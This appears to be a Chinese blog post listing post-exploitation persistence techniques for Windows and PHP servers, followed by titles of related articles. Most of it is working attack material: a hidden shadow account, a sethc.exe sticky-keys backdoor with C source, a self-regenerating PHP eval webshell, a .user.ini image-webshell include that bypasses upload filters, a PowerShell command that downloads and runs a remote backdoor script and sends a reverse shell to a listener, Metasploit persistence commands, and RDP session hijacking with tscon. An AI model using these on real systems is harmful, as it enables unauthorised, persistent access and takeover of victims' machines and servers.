一、影子账户

net user admin$ admin /add

具体可以通过注册表查找
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names
在默认情况下,隐藏用户的查看是隐藏的。

解决方法:在SAM文件夹处点击右键—>权限(设置就好了)


二、shift后门
1、先删除缓存C:\WINDOWS\system32\dllcache\sethc.exe
2、C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe
代码:

#include<cstdio>
#include<cstring>
#include<cstdlib>
#include<conio.h>
int main(void)
{char welcome[1700] = " \n\Please input your password! \n\password : ";while(1){char password[30];char pwd[30] = "adexx!@#QWE";printf("%s",welcome);puts("");printf("你输入的密码:");scanf("%s",password);if(strncmp(password,pwd,11) == 0){system("cmd.exe");}else{printf("%s","Error\n");fflush(stdin);}}return 0;
}

注. 这里种shift后门目标是2008的机器的话 那么可以用2003的远程连接工具进行连接


三、不死马(web层面的权限维持)

1、事先隐藏后门文件操作:右键-》属性-》隐藏

2、将木马名字进行伪装处理,伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。

3、利用循环不死马(举栗子)

<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");$b=array_keys($a)[0];eval($b);?>');sleep(8);
}
?>

说明:此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马.


四:利用.user.ini文件自动包含木马文件

利用成功前提下必须有以下三个文件,
1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马

创建一个文件夹test
1、test.php 内容为 <?php echo 1;?>

2、luomiweixiong.gif 内容为<?php if(@$_GET['shell']=='test'){phpinfo();}?>

3、在“.user.ini”文件写入: auto_prepend_file=luomiweixiong.gif

浏览器访问:http://127.0.0.1/test/test.php?shell=test
则出现的为phpinfo()函数执行的效果

原理:
https://www.php.net/manual/zh/configuration.file.per-user.php

在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别

这里就很清楚了,.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置)

实际上 这里面没有说完整,其实除了PHP_INI_SYSTEM以外的模式(包括PHP_INI_ALL)都是可以通过.user.ini来设置的。

其中有个配置项auto_prepend_file就可以被利用导致后门的生成

auto_prepend_file:指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中

隐藏知识:某网站限制不允许上传.php文件,你便可以上传一个.user.ini,再上传一个图片马,包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了。 再比如,你只是想隐藏个后门,这个方式是最方便的。


五、Powershell权限维持
参考此PowerShell脚本
https://github.com/re4lity/Schtasks-Backdoor

执行代码:powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"

说明:
1、192.168.124.25为受害者IP,前提是要把PowerShell脚本放到受害者服务器能访问到的根路径。
2、192.168.124.14为接收反弹回来的IP,可用NC监听反弹回来的shell


六、metasploit权限维持(老生常谈直接操作就好了哈)

1、Persistence模块
前提是利用MSF获取到了对方的会话
run persistence -U -i 12 -p 6666 -r 192.168.124.14

说明
-i 目标自动回连时间
-p 设置目标反向连接的端口
-r 设置目标反向连接的ip地址
-U 设置目标自启动
加入自启动后,就算受害者机器再次启动也能弹回shell

2、metsvc 模块
前提是利用MSF获取到了对方的会话
run metsvc -A

说明:

-A 自动启动一个匹配的 multi/handler 以连接到该服务
该模块是在受害者服务器开启了一个“Meterpreter”服务
下次攻击者可以利用metsvc_bind_tcp监听模块就可以再次获取到shell
监听端口为31337


七、会话劫持

说明:RDP会话劫持是在不知道另一用户密码的条件下进行切换用户登录

query user
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"
net start sesshijack

tscon 参数为query user命令中的所要劫持ID参数
dest: 为你当前用户的会话名

后渗透权限维持的方法相关推荐

  1. 渗透工具-后渗透-权限维持-Cobalt strike

    Cobalt strike 渗透测试人员的先进威胁战术 英文名词翻译对照表 命令快查 Cobaltstrike简介 Cobaltstrike架构 信息收集模块System Profiler user- ...

  2. windows系统后渗透阶段权限维持方法小结

    前言 归纳下windows系统维持权限的方法 1.schtasks 计划任务 schtasks 是 Windows 自带的命令,使用 schtasks 命令创建计划任务 下面这句的意思是创建一个名称是 ...

  3. [系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  4. 后渗透篇:常见backdoor和persistence方式方法

    常见backdoor和persistence方式方法 系统工具替换后门 Image 劫持辅助工具管理器 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT ...

  5. [网络安全提高篇] 一〇三.Metasploit后渗透技术之信息收集、权限提权和功能模块

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  6. 后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门

    当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 0x02 主要操作部分 0x03 主要命令组成 ...

  7. MSF(六):后渗透

    后渗透测试 安全牛学习Metasploit Framework笔记 一.已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二.基于已有session扩大战果 ...

  8. 记一次攻防演练之vcenter后渗透利用

    1. 说明 很早之前的一次攻防演练,主要是从web漏洞入手,逐渐学习vcenter后利用技术.过程由于太长,很多细节都省略了,中间踩坑.磕磕绊绊的地方太多了... 由于敏感性,很多地方都是打码或者是没 ...

  9. 内网渗透|后渗透之远程桌面

    内网渗透|后渗透之远程桌面 0x00 前言 在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留 ...

  10. linux 两块硬盘做r0,本文是emp3r0r:Linux用户打造的Linux后渗透框架的后续。

    介绍 首先感谢大家对 emp3r0r 的肯定,如果有什么想法可以在评论区交流. 最近添加了些我觉得可能有用的东西,今天要介绍的就是dropper和packer两个新功能. dropper顾名思义是用来 ...

最新文章

  1. pass基础架构分析
  2. WinForm读取相对路径(项目文件)下的图片
  3. php正则表达式实例详解,正则表达式实例解析
  4. 200825C文件 复习
  5. php导出excel失败原因,PHPExcel导出Excel文件报找不到该文件错误
  6. 使用 C++的第三方库 jsoncpp的步骤以及出现的问题
  7. python画彩虹爱心_用python画一颗彩虹色爱心送给女朋友!!!
  8. 为什么要模拟表单提交
  9. 【英语学习】【WOTD】resurrection 释义/词源/示例
  10. docker导入与导出容器
  11. 嘿,我这里有一个 Survey!
  12. 【报告分享】零售行业三大平台之对比分析-阿里VS京东VS拼多多:分级、竞争、进化.pdf...
  13. 问题二十七:ray traing中的positionable camera
  14. Unity 协同程序
  15. 【渝粤题库】 陕西师范大学 210021 学前儿童健康教育 作业(专升本)
  16. C# Windows异步I/O操作
  17. 愚人节的礼物Java
  18. 【历史上的今天】5 月 28 日:图灵提交划时代论文;DR DOS 的第一个版本发布;TrueCrypt 停止开发
  19. 沙盘模拟软件_三连冠!我校学子连续三年蝉联全国大学生沙盘模拟经营大赛福建省决赛一等奖...
  20. echarts中国地图,省市标注代码

热门文章

  1. unity案例星际迷航_《星际迷航》:自1964年以来启发人们和他们的技术
  2. windows系统用cmd命令开启WiFi共享功能
  3. 红蓝军模拟对抗三维电子沙盘开发教程第十课 wpf建立3D GIS数字地球
  4. 基于51单片机的恒温加热系统--main.c文件
  5. PHP下载远程图片的3个方法
  6. 叛逆连队2怎么自建服务器,《战地:叛逆连队2》目前暂不支持第三方服务器
  7. Fiddler高级用法—FiddlerScript抓取app网页json数据并保存
  8. 高质量WordPress下载站模板5play主题源码
  9. 目标检测之YOLOX: Exceeding YOLO Series in 2021
  10. 长城汽车携旗下哈弗、欧拉、长城皮卡及WEY登陆北京车展